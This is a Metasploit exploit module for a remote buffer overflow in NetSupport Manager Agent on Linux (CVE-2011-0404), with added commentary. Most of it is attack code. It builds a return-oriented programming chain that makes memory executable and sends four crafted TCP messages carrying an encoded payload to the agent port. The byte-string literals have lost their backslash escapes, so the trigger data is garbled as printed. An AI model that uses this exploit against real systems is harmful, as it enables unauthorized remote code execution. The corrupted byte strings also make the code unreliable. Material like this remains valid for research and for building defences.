
# Title : NetSupport Manager Agent Remote Buffer Overflow
# Published : 2011-03-03
# Author :


##
# $Id: netsupport_manager_agent.rb 11868 2011-03-03 01:04:47Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit exploit module for the NetSupport Manager Agent buffer overflow
# (CVE-2011-0404 / OSVDB 70408, see 'References' below). One Linux x86 target;
# the 'Description' states the module reuses a ROP approach from proftpd_iac
# to get around a non-executable stack.
# Defender note: on the wire this is a four-message TCP exchange to the agent
# port (RPORT defaults to 5405) with a one-second pause between messages; the
# third message carries the encoded payload and the packed ROP stack.
class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking  # framework reliability ranking for this module

	# Presumably supplies connect / sock / disconnect used in #exploit below.
	include Msf::Exploit::Remote::Tcp

	# Registers module metadata (name, authors, references, payload limits,
	# the single target and its ROP stack) and the RPORT option.
	#
	# @param info [Hash] extra module info merged in via update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetSupport Manager Agent Remote Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in NetSupport Manager Agent. It
				uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.
			},
			'Author'         =>
				[
					'Luca Carettoni (@_ikki)',  # original discovery / exploit
					'Evan',  # ported from exploit-db exploit
					'jduck'  # original proftpd_iac ROP, minor cleanups
				],
			'Arch'           => ARCH_X86,
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11868 $',
			'References'     =>
				[
					[ 'CVE', '2011-0404' ],
					[ 'OSVDB', '70408' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/15937/' ]
				],
			'Privileged'     => true,
			'Platform'       => 'linux',
			# Payload constraints: 'Space' is written in hex; no bad characters
			# are declared and NOP sled generation is disabled.
			'Payload'        =>
				{
					'Space'    => 0x975,
					'BadChars' => "",
					'DisableNops'  => true,
				},
			'Targets'        =>
				[
					[ 'linux',
						{
							'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;
							'Pad' => 975, # decimal; #exploit pads the C stage up to this length
							# Entries equal to 0xcccccccc are placeholders that #exploit
							# replaces with random dwords before packing the stack.
							'RopStack' =>
								[
									### mmap isn't used in the binary so we need to resolve it in libc
									0x00041160, # mmap64 - localtime
									0xa9ae0e6c, # 0x8092b30 - 0x5e5b1cc4, localtime will become mprotect
									0xcccccccc,
									0x08084662, # add    DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;
									0xcccccccc,
									0xcccccccc,
									0x080541e4, # localtime@plt (now mmap64)
									0x080617e3, # add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;
									0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64 arguments
									0x0, # unused
									0x08066332, # pop edx; pop ebx; pop ebp ;;
									"x89x1cxa8xc3".unpack('V').first, # mov [eax+ebp*4], ebx
									0xcccccccc,
									0xcccccccc,
									0x080555c4, # mov [eax] edx ; pop ebp ;;
									0xcccccccc,
									#0x0807385a, # push eax ; adc al 0x5d ;;

									### this is  the stub used to copy shellcode from the stack to
									### the newly mapped executable region
									#x8DxB4x24x7DxFBxFF      # lea esi,[dword esp-0x483]
									#x8Dx78x12                  # lea edi,[eax+0x12]
									#x6Ax7F                      # push byte +0x7f
									#x59                          # pop ecx
									#xF3xA5                      # rep movsd

									### there are no good jmp eax so  overwrite getrlimits GOT entry
									0x0805591b, # pop ebx; pop ebp ;;
									0x08092d68 - 0x4, # 08092d68  0002f007 R_386_JUMP_SLOT   00000000   getrlimit
									0x1,        # becomes ebp
									0x08084f38, # mov [ebx+0x4] eax ; pop ebx ; pop ebp ;;
									0xfb7c24b4, # become eb
									0x01,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									#0xffff8d78, # become ebx
									0x788dffff,
									0x2,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									0x597f6a12,
									0x3,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									0x9090a5f2,
									0x4,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									0x8d909090,
									0x0,
									0x08054ac4, # <getrlimit@plt>
									0xcccccccc,
									0x01010101,
								]
						}
					]
				],
			'DisclosureDate' => 'Feb 12 2010',
			'DefaultTarget' => 0))

		# Only the agent port is configurable; everything else is fixed above.
		register_options(
			[
				Opt::RPORT(5405),
			], self.class)
	end

	# Sends the four-stage trigger sequence over one TCP connection. Stages A,
	# B and D are fixed messages; stage C is built from a fixed prefix, the
	# encoded payload, padding up to target['Pad'], the packed return address,
	# the packed ROP stack and a fixed suffix.
	#
	# NOTE(review): the string literals below appear to have lost their
	# backslash escapes in this copy (e.g. "x15x00" instead of escaped bytes),
	# so as printed they are plain ASCII text and presumably not the intended
	# bytes; treat the offsets and lengths here as unverified.
	def exploit
		connect

		#pop_eax_ebx ;
		#0x8084662 # add    DWORD PTR [ebx+0x5e5b1cc4],eax ;;
		triggerA = "x15x00x5ax00" + "x41" * 1024 + "x00x00x00" +
			"x00x00x00x00x00x00x00x00x00x00"

		triggerB = "x25x00x51x00x81x41x41x41x41x41x41x00" +
			"x41x00x00x00x00x00x00x00x00x00x00x00" +
			"x00x00x00x00x00x00x00x00x00x00x00x00" +
			"x00x00x00"

		# Stage C: prefix, payload, padding to target['Pad'], then the return
		# address packed as a little-endian dword.
		triggerC = "x37x00x03x00x0ax00x00x00x00x00x58xb4" +
			"x92xffx00x00x69x6bx6bx69x00x57x4fx52" +
			"x4bx47x52x4fx55x50x00x3cx3e" + #pleasure trail
			#"xcc" +
			"x90" +
			payload.encoded +
			"xcc" * (target['Pad'] - payload.encoded.length) +
			[target.ret].pack('V')

		# Packed ROP stack as little-endian dwords ('V*'); every 0xcccccccc
		# placeholder is swapped for a random dword. Stays empty if the target
		# defines no 'RopStack'.
		new = ''
		if target['RopStack']
			new << target['RopStack'].map { |e|
				if e == 0xcccccccc
					rand_text(4).unpack('V').first
				else
					e
				end
			}.pack('V*')
		end

		triggerC << new
		triggerC << "x00" * 4
		triggerC << "x00x00x31x32x2ex36x32x2ex31x2ex34x32"
		triggerC << "x30x00x31x30x00x00"

		triggerD = "x06x00x07x00x20x00x00x00x0ex00x32x00" +
			"x01x10x18x00x00x01x9fx0dx00x00xe0x07" +
			"x06x00x07x00x00x00x00x00x02x00x4ex00" +
			"x02x00xacx00x04x00x7fx00x00x00"

		# Each stage is followed by Kernel#select with no descriptors and a
		# one-second timeout, i.e. a plain sleep between messages.
		print_status("Sending A")
		sock.put(triggerA)
		select(nil, nil, nil, 1)

		print_status("Sending B")
		sock.put(triggerB)
		select(nil, nil, nil, 1)

		print_status("Sending C")
		sock.put(triggerC)
		select(nil, nil, nil, 1)

		print_status("Sending D")
		sock.put(triggerD)
		select(nil, nil, nil, 1)

		disconnect
	end
end